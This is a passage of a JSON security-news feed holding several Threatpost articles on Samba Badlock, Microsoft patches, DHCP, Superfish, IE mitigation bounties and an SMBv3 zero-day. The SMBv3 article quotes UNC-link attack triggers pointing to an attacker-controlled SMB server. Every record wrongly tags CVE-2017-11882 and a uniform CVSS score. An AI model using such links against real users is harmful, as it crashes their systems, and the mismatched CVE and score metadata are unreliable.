"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:35", "description": "Despite the [Badlock hype machine](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>) cranked up high, we don\u2019t know much about this impending soul-crushing vulnerability other than it could be bad, it could be in the Windows Server Message Block and it already has its own requisite logo and website.\n\nNonetheless, we have a little more than two weeks before the next Microsoft Patch Tuesday on April 12 to speculate, guess and fear what might come first: the patch or a public exploit.\n\nStefan Metzmacher, a member of the Samba team and an employee with German consultancy SerNet, is credited with finding the bug and said 
both Samba and Windows will be patched. He said deductive reasoning leads us to consider that the bug might be in Server Message Block (SMB). Samba is an open source SMB implementation.\n\nBug hunters, good and bad, are surely on the case and some have already found what could be a juicy clue in one of Metzmacher\u2019s [commits to git.samba.org](<https://git.samba.org/?p=samba.git;a=blob;f=source4/libcli/smb2/lock.c;h=f2a76d876a103ce0dd06a5b362c2e629974772d5;hb=HEAD>). Metzmacher is the author of the lock.c file in Samba\u2014it handles SMB2 client lock handling\u2014and within a particular commit he includes a comment: \u201c/* this is quite bizarre \u2013 the spec says we must lie about the length! */\u201d\n\nThere\u2019s no confirmation this is the bug, but one researcher told Threatpost that the comment indicates that there are places in the protocol where the size of a string would be misrepresented. This could lead to serious errors because a developer could use the size to allocate space in a buffer, which is fine if the number is accurate. But if the length is a \u201clie\u201d as Metzmacher says, and you copy more bytes than there is room allocated, you have a buffer overrun and potentially code execution.\n\nWhether there is enough information here for an exploit writer to craft something nasty in the next two weeks remains to be seen. One thing is for certain, however: defenders will sway in the wind for the next 15 days.\n\n\u201cA skilled exploit writer may have enough information to write an exploit based on this information. On the other hand, as a defender, I am missing some details,\u201d said Johannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center. \u201cFor example, it would be nice to know if this affects servers only, or clients as well. Which network ports and which SMB version are affected? 
These are things that would help defenders, but they are missing from the advisory.\u201d\n\nThe [Badlock website](<http://badlock.org/>) isn\u2019t helpful on details either, other than to say that patches will be available for Samba 4.4, 4.3 and 4.2; it cautions that since Samba 4.4.0 was released March 22, Samba 4.1 will no longer be supported.\n\nThe SANS website, meanwhile, cautions that UNIX administrators need to pay attention to the details once they\u2019re made public, and suggests [scanning environments](<https://isc.sans.edu/diary/Getting+Ready+for+Badlock/20877>) for servers with SMB enabled; it\u2019s expected that UNIX implementations would also patch on or around April 12.\n\nIn the meantime, the situation has also stirred up a healthy debate over whether big bugs are being trivialized, not only by self-serving advanced notification, but also by websites and branding with logos.\n\nFrom Badlock.org:\n\n> \u201cThe main goal of this announcement is to give a heads up and to get you ready to patch all systems as fast as possible and have sysadmin resources available on the day the patch will be released. Vendors and distributors of Samba are being informed before a security fix is released in any case. This is part of any Samba security release process.\n> \n> Weighting to the respective interests of advance warning and utmost secrecy we chose to warn you beforehand, so that everyone has a chance to be ready to install the fixes as soon as they are available. Once the patch is released to the public, it will point to attack vectors and exploits will be in the wild in no time.\u201d\n\nMicrosoft has chosen not to add anything to the discussion; a representative told Threatpost: \u201cUnfortunately, Microsoft doesn\u2019t have anything to share.\u201d SerNet CEO Johannes Loxen refused to comment further in an email to Threatpost beyond what is on the badlock.org site. 
Loxen did concede in a tweet that the advanced notification on the bug is self-serving in terms of marketing and attention toward his company. The tweets have since been deleted.\n\nDan Kaminsky, whose 2008 DNS vulnerability and patch coordination is largely considered the first of its kind, was critical of the hype. He told _Wired_ that this [type of disclosure](<http://www.wired.com/2016/03/hype-around-mysterious-badlock-bug-raises-criticism/>) isn\u2019t helpful to admins. \u201cWhat\u2019s the call to action other than to pay attention?\u201d\n\nAndrew Storms, vice president of security services at New Context, recalled the angst for some around Microsoft\u2019s decision last January to discontinue Patch Tuesday advanced notification and limit it only to [paying Premier customers](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/>).\n\n\u201cI\u2019ve always been a proponent of the advanced notification. And I was one of the people upset when Microsoft closed up ANS. That few days of heads up gives managers a chance to prep resources,\u201d Storms said. \u201cWhether that\u2019s people or servers or test systems, I\u2019ve always contended that some heads up is better than the big surprise disruption.\u201d\n\nSANS\u2019 Ullrich said advanced notification allows for preparation in areas such as inventories of vulnerable systems, countermeasures and configuration options, all of which speed up patching.\n\n\u201c\u2018Branded\u2019 vulnerabilities are likely patched faster and more organizations will patch them given the attention paid to them (it would be nice to collect some hard numbers on this, but I haven\u2019t seen any studies to that effect yet),\u201d Ullrich said. \u201cOn the other hand, \u2018branded\u2019 vulnerabilities should be reserved for the most severe vulnerabilities. 
In that way, we will have to see if this vulnerability does meet that threshold.\u201d\n", "cvss3": {}, "published": "2016-03-28T11:45:05", "type": "threatpost", "title": "Badlock Bug in Samba SMB Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-12T18:50:16", "id": "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "href": "https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "Prompted by the disclosure of a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-working-on-patch-for-ie-8-zero-day/106247>) more than six months after it was reported, Microsoft next Tuesday will finally issue a patch.\n\nHP\u2019s Zero Day Initiative (ZDI) released on May 21 some detail on a previously unreported use-after-free bug in IE 8. No public exploits were reported and while Microsoft acknowledged receipt of the vulnerability report from ZDI, it had not produced a patch prior to ZDI\u2019s disclosure per its guidelines.\n\nThe vulnerability affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cSome fixes are more complex than others, and we must test every one against a huge number of programs, applications and different configurations,\u201d a Microsoft spokesperson said. 
\u201cWe continue to encourage customers to upgrade to a modern operating system, such as Windows 7 or 8.1, and run the latest version of Internet Explorer which includes further protections.\u201d\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s [Patch Tuesday security updates.](<https://technet.microsoft.com/en-us/library/security/MS14-JUN>) There will be seven bulletins in all, five rated important by the company. The IE patch will likely be a cumulative rollup as it affects the browser all the way back to IE 6 on Windows Server 2003.\n\nThe second critical bulletin is also a remote code execution vulnerability, this one in Microsoft Office and Microsoft Lync, the company\u2019s messaging and video conferencing application. The vulnerability is rated critical for Lync 2013 and 2010, as well as Live Meeting 2007 Console; it is rated important for Microsoft Office 2010 and Office 2007.\n\n\u201cGiven that the second bulletin will affect Lync Server and the older Live Meeting Console this may be a truly remotely exploitable vulnerability,\u201d said Ross Barrett, senior manager of security engineering at Rapid7.\n\nWindows Server 2003, it should be noted, has nearly entered its last year of support; it\u2019s scheduled to go end-of-life in July 2015.\n\n\u201cWe are coming up on just a year out now and because any changes to your server will likely be a significant amount of work, it isn\u2019t too soon to get started on that plan,\u201d said Russ Ernst, director of product management at Lumension.\n\nThe remaining bulletins, all rated important, include a remote code execution bug in Office, separate information disclosure vulnerabilities in Windows and Lync Server, a denial-of-service vulnerability in Windows, and a tampering vulnerability in Windows.\n\n\u201cThe tampering label on the seventh bulletin may 
suggest it allows a message to be altered in transit,\u201d Barrett said. \u201cProbably a limited scenario for exploitation.\u201d\n", "cvss3": {}, "published": "2014-06-05T14:30:33", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-10T18:53:57", "id": "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "href": "https://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, or the Dynamic Host Configuration Protocol, automates assigning IP addresses and configuration information to hosts. 
It\u2019s used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, but the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workarounds available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:54", "description": "Microsoft has released the emergency out-of-band patch for the [ASP.NET padding oracle attack](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>), less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina. 
\n\nThe patch for the ASP.NET bug is only available through [Microsoft\u2019s Download Center](<https://www.microsoft.com/downloads/en/default.aspx?pf=true>) right now, but the company plans to push it out over Windows Update and Windows Server Update within a few days, as well.\n\n\u201cFor customers who use Automatic Updates, the update will be automatically applied once it is released broadly. Once the Security Update is applied, customers are protected against known attacks related to Security Advisory 2416728,\u201d said Dave Forstrom, director of Trustworthy Computing at Microsoft.\n\nThe company will hold a [live webcast](<https://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032464130&EventCategory=4&culture=en-US&CountryCode=US>) at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release.\n\nThe ASP.NET vulnerability first came to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, [discussed the bug and their technique for exploiting it](<https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/>). The attack itself is an implementation of an existing technique developed several years ago to exploit weaknesses in crypto implementations.\n\n\u201cWe knew ASP.NET was vulnerable to our attack several months ago, but we didn\u2019t know how serious it is until a couple of weeks ago. It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security,\u201d said Duong, when discussing the attack. \u201cIt\u2019s worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It\u2019s just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. 
The longest time it ever takes is less than 50 minutes.\u201d\n\nLast week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don\u2019t protect against the attack in general, only against one version of it.\n\nMicrosoft didn\u2019t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an [out-of-band patch](<https://threatpost.com/attacks-escalate-microsoft-ships-emergency-windows-patch-080210/>) for the original bug that was identified as part of the Stuxnet malware attack.\n", "cvss3": {}, "published": "2010-09-28T18:12:43", "type": "threatpost", "title": "Microsoft Pushes Emergency Patch For ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:24:17", "id": "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "href": "https://threatpost.com/microsoft-pushes-emergency-patch-aspnet-flaw-092810/74525/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:27", "description": "Microsoft has patched a serious vulnerability in the Windows TCP/IP stack that, under some conditions, could enable an attacker to run code on remote machines. 
The flaw lies in the way that the stack handles large amounts of specially formatted packets sent to a vulnerable machine.\n\nMicrosoft officials said that the vulnerability, which is one of a handful of flaws fixed by the company in November\u2019s Patch Tuesday release, is a serious one, but that the scenarios in which it can be exploited for remote code execution are limited. The vulnerability crops up when an attacker sends a large volume of crafted UDP packets to a machine on a port that doesn\u2019t have any service listening on it.\n\n\u201cWhile processing these network packets it is observed that some used structures are referenced but not dereferenced properly. This unbalanced reference counting could eventually lead to an integer overflow of the reference counter,\u201d [Microsoft\u2019s SWIAT team](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>) said in a blog post on the vulnerability.\n\nIn order for the bug to be exploitable, some specific conditions need to be present. If a dereference happens immediately after the counter has gone back to zero, Windows will free the structure. If that happens, there are four things that can occur, Microsoft said: \n\u2022 The memory is still mapped and contains the old data. No crash results and the system works as normal. \n\u2022 The memory is unmapped and the system crashes when it is referenced. This results in a system denial-of-service. \n\u2022 The memory is re-allocated for the same structure. No crash results and the system works as normal. \n\u2022 The memory is re-allocated for a different structure. 
This could result in a system crash, or if attacker-controlled data is present, could lead to memory corruption or remote code execution.\n\nThe last scenario in the list is the one that could lead to remote code execution, the company said.\n\n\u201cWhile the last scenario can theoretically lead to RCE, we believe it is difficult to achieve RCE using this vulnerability considering that the type of network packets required are normally filtered at the perimeter and the small timing window between the release and next access of the structure, and a large number of packets are required to pull off the attack,\u201d Microsoft\u2019s team said.\n", "cvss3": {}, "published": "2011-11-09T15:20:26", "type": "threatpost", "title": "Microsoft Patches Critical Bug in Windows TCP/IP Stack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:23", "id": "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "href": "https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/75872/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:57", "description": "Microsoft has taken steps to impede the next Superfish from impacting users.\n\n[Superfish was pre-installed adware](<https://threatpost.com/lenovo-superfish-certificate-password-cracked/111165/>) found on new Lenovo laptops earlier this year. The software exposes users to man-in-the-middle attacks because of the way it injects advertisements into the browser. It comes with a self-signed root cert that generates certs for HTTPS connections, replacing existing certs with its own in the process. 
Attackers could take advantage of this scenario\u2014especially after the password for the cert that shipped with Superfish was found\u2014to listen in on encrypted communication.\n\nMicrosoft this week said it has [updated its rules around adware](<https://blogs.technet.microsoft.com/mmpc/2015/12/21/keeping-browsing-experience-in-users-hands/>), and now such programs that build ads in the browser are required to only use the browser\u2019s \u201csupported extensibility model for installation, execution, disabling and removal.\u201d Microsoft said starting March 31, 2016 it will detect and begin removing programs that are not in compliance.\n\n\u201cThe choice and control belong to the users, and we are determined to protect that,\u201d wrote Barak Shein and Michael Johnson of Microsoft\u2019s Malware Protection Center.\n\nLenovo quickly patched the original Superfish issue and shortly thereafter, browser makers such as [Mozilla removed the root cert from Firefox\u2019s trusted root store](<https://threatpost.com/mozilla-pushes-hot-fix-to-remove-superfish-cert-from-firefox/111335/>).\n\nSuperfish\u2019s ability to perform SSL interception by proxy was certainly worrisome behavior from a supposedly trusted product, one that was suddenly opening the door not only to man-in-the-middle attacks, but also the manipulation of DNS settings and other network-layer attacks. Worse yet was that Superfish-like software would not trigger warnings about man-in-the-middle attacks.\n\n\u201cAll of these techniques intercept communications between the Internet and the PC to inject advertisements and promotions into webpages from outside, without the control of the browser,\u201d Microsoft said. 
\u201cOur intent is to keep the user in control of their browsing experience and these methods reduce that control.\u201d\n", "cvss3": {}, "published": "2015-12-23T09:01:25", "type": "threatpost", "title": "Microsoft Bans Superfish SSL Interception Adware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-12-23T14:01:25", "id": "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "href": "https://threatpost.com/microsoft-to-remove-superfish-like-programs-starting-in-march/115730/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "description": "When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser.\n\nA team of experts from HP\u2019s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they\u2019d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense.\n\nA chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs.\n\n\u201cWe were very excited when we heard the results from Microsoft,\u201d Gorenc, ZDI lead researcher, said. \u201cWe put a lot of time and effort into that research. 
We\u2019re glad to hear Microsoft got good data out of it.\u201d\n\nGorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR).\n\n\u201cWe use one mitigation to defeat another,\u201d he said. \u201cStuff like this has been done in the past, but what\u2019s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we\u2019ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.\u201d\n\nUse-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They occur when memory allocated to a pointer has been freed but the pointer is still used, allowing attackers to reuse that freed memory for malicious code that is then executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part, [bypasses of and attacks against mitigations have largely been confined to researchers and academics](<http://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570>), but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. 
Operation Snowman, for example, an APT operation against military and government targets, [scanned for the presence of EMET and would not execute](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) if the tool was detected.\n\nInternet Explorer has been plagued by [memory corruption bugs](<http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175>) forever it seems, with Microsoft releasing almost [monthly cumulative updates for the browser](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>), which is constantly being used in targeted attacks and has been easy pickings for hackers.\n\n\u201cThe attack surface is valuable and has to exist,\u201d Gorenc said of IE and use-after-free bugs. \u201cIt\u2019s an attack surface where with slight manipulations, you can gain code execution on the browser.\u201d\n\nZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million over the past nine years buying vulnerabilities.\n\nGorenc\u2019s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. 
For these attacks, Zuckerbraun [reverse engineered MemProtect](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Efficacy-of-MemoryProtection-against-use-after-free/ba-p/6556134#.VNNkLC60CL0>), studying how it stymied use-after-free vulnerabilities. Hariri focused on [bypassing Isolated Heap](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/HP-Security-Briefing-episode-18-New-directions-in-use-after-free/ba-p/6659998#.VNNkNS60CL0>). Together with Gorenc\u2019s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft.\n\nThe reward, meanwhile, will be donated to the three education institutions, each of which has personal meaning to the respective researchers and their focus on STEM.\n\n\u201cHP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,\u201d Gorenc said. \u201cWe look at it as a way to give back. 
Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.\u201d\n", "cvss3": {}, "published": "2015-02-05T10:19:00", "type": "threatpost", "title": "IE Memory Attacks Net ZDI $125,000 Microsoft Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-12T17:07:39", "id": "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "href": "https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. 
Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in an email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\\\attacker.com\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. This means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. 
This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address]\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. 
The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and an SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be 
folded into Microsoft products.\n\nThe company has already paid out several hundred thousand dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500, and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. 
That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear 
